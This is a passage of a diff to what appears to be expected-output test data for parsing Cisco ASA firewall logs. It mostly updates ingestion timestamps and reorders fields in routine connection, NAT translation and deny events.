CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1998,7 +1998,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603874500Z", + "ingested": "2021-12-14T14:37:05.575480466Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", @@ -2080,7 +2080,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603880300Z", + "ingested": "2021-12-14T14:37:05.575480818Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", @@ -2159,7 +2159,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603886100Z", + "ingested": "2021-12-14T14:37:05.575481174Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", @@ -2242,7 +2242,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603891900Z", + "ingested": "2021-12-14T14:37:05.575481525Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", @@ -2321,7 +2321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603897800Z", + "ingested": "2021-12-14T14:37:05.575481852Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", @@ -2405,7 +2405,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603903600Z", + "ingested": "2021-12-14T14:37:05.575482184Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2489,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603909400Z", + "ingested": "2021-12-14T14:37:05.575482519Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2574,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603915200Z", + "ingested": "2021-12-14T14:37:05.575482851Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2658,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603921Z", + "ingested": "2021-12-14T14:37:05.575483196Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", @@ -2740,7 +2740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603926900Z", + "ingested": "2021-12-14T14:37:05.575483541Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", @@ -2819,7 +2819,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603932700Z", + "ingested": "2021-12-14T14:37:05.575483875Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2902,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603941800Z", + "ingested": "2021-12-14T14:37:05.575484308Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2981,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603946100Z", + "ingested": "2021-12-14T14:37:05.575484639Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3065,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603953400Z", + "ingested": "2021-12-14T14:37:05.575484986Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3150,7 +3150,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603958Z", + "ingested": "2021-12-14T14:37:05.575485333Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", @@ -3234,7 +3234,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603963900Z", + "ingested": "2021-12-14T14:37:05.575485655Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3316,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603967700Z", + "ingested": "2021-12-14T14:37:05.575485987Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3395,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603972300Z", + "ingested": "2021-12-14T14:37:05.575486319Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3479,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603978200Z", + "ingested": "2021-12-14T14:37:05.575486654Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3563,7 +3563,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603983700Z", + "ingested": "2021-12-14T14:37:05.575486981Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3648,7 +3648,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603987600Z", + "ingested": "2021-12-14T14:37:05.575487315Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3732,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603991900Z", + "ingested": "2021-12-14T14:37:05.575487650Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3814,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603995400Z", + "ingested": "2021-12-14T14:37:05.575487983Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3893,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603999900Z", + "ingested": "2021-12-14T14:37:05.575488465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", @@ -3979,7 +3979,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604005800Z", + "ingested": "2021-12-14T14:37:05.575488807Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", @@ -4062,7 +4062,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604011600Z", + "ingested": "2021-12-14T14:37:05.575489137Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4147,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604017500Z", + "ingested": "2021-12-14T14:37:05.575489475Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4231,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604023500Z", + "ingested": "2021-12-14T14:37:05.575489958Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604029300Z", + "ingested": "2021-12-14T14:37:05.575490787Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", @@ -4392,7 +4392,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604035200Z", + "ingested": "2021-12-14T14:37:05.575491150Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", @@ -4475,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604041Z", + "ingested": "2021-12-14T14:37:05.575491492Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", @@ -4554,7 +4554,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604046800Z", + "ingested": "2021-12-14T14:37:05.575491830Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4637,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604052600Z", + "ingested": "2021-12-14T14:37:05.575492176Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4716,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604058300Z", + "ingested": "2021-12-14T14:37:05.575492508Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", @@ -4800,7 +4800,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604064100Z", + "ingested": "2021-12-14T14:37:05.575492839Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4885,7 +4885,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604070Z", + "ingested": "2021-12-14T14:37:05.575493183Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604093600Z", + "ingested": "2021-12-14T14:37:05.575493517Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", @@ -5046,7 +5046,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604115100Z", + "ingested": "2021-12-14T14:37:05.575493861Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5129,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604119200Z", + "ingested": "2021-12-14T14:37:05.575494242Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", @@ -5208,7 +5208,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604123500Z", + "ingested": "2021-12-14T14:37:05.575494581Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", @@ -5292,7 +5292,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604128200Z", + "ingested": "2021-12-14T14:37:05.575494918Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5378,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604132800Z", + "ingested": "2021-12-14T14:37:05.575495249Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604136400Z", + "ingested": "2021-12-14T14:37:05.575495575Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", @@ -5539,7 +5539,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604140600Z", + "ingested": "2021-12-14T14:37:05.575495912Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", @@ -5624,7 +5624,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604146Z", + "ingested": "2021-12-14T14:37:05.575496235Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", @@ -5706,7 +5706,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604151100Z", + "ingested": "2021-12-14T14:37:05.575496570Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5785,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604154700Z", + "ingested": "2021-12-14T14:37:05.575496903Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5810,22 +5810,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -5835,12 +5829,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604158400Z", + "ingested": "2021-12-14T14:37:05.575497240Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", @@ -5854,7 +5851,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -5915,7 +5915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604161700Z", + "ingested": "2021-12-14T14:37:05.575497570Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", @@ -5994,7 +5994,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604165800Z", + "ingested": "2021-12-14T14:37:05.575497895Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6019,22 +6019,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6044,12 +6038,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604171300Z", + "ingested": "2021-12-14T14:37:05.575498222Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", @@ -6063,25 +6060,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6091,12 +6085,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604177Z", + "ingested": "2021-12-14T14:37:05.575498671Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6110,25 +6107,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6138,12 +6132,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604182400Z", + "ingested": "2021-12-14T14:37:05.575499006Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", @@ -6157,25 +6154,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6185,12 +6179,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604187800Z", + "ingested": "2021-12-14T14:37:05.575499337Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6204,25 +6201,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6232,12 +6226,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604193200Z", + "ingested": "2021-12-14T14:37:05.575499674Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", @@ -6251,25 +6248,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6279,12 +6273,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604198500Z", + "ingested": "2021-12-14T14:37:05.575500004Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", @@ -6298,7 +6295,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6362,7 +6362,7 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604204Z", + "ingested": "2021-12-14T14:37:05.575500333Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", @@ -6447,7 +6447,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.604209400Z", + "ingested": "2021-12-14T14:37:05.575500682Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", @@ -6529,7 +6529,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604214700Z", + "ingested": "2021-12-14T14:37:05.575501045Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", @@ -6608,7 +6608,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604220100Z", + "ingested": "2021-12-14T14:37:05.575501387Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", @@ -6691,7 +6691,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604225400Z", + "ingested": "2021-12-14T14:37:05.575501718Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6772,7 +6772,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604230800Z", + "ingested": "2021-12-14T14:37:05.575502049Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6853,7 +6853,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604236200Z", + "ingested": "2021-12-14T14:37:05.575502381Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6934,7 +6934,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604241500Z", + "ingested": "2021-12-14T14:37:05.575502711Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7015,7 +7015,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604246900Z", + "ingested": "2021-12-14T14:37:05.575503070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7096,7 +7096,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604252200Z", + "ingested": "2021-12-14T14:37:05.575503484Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst 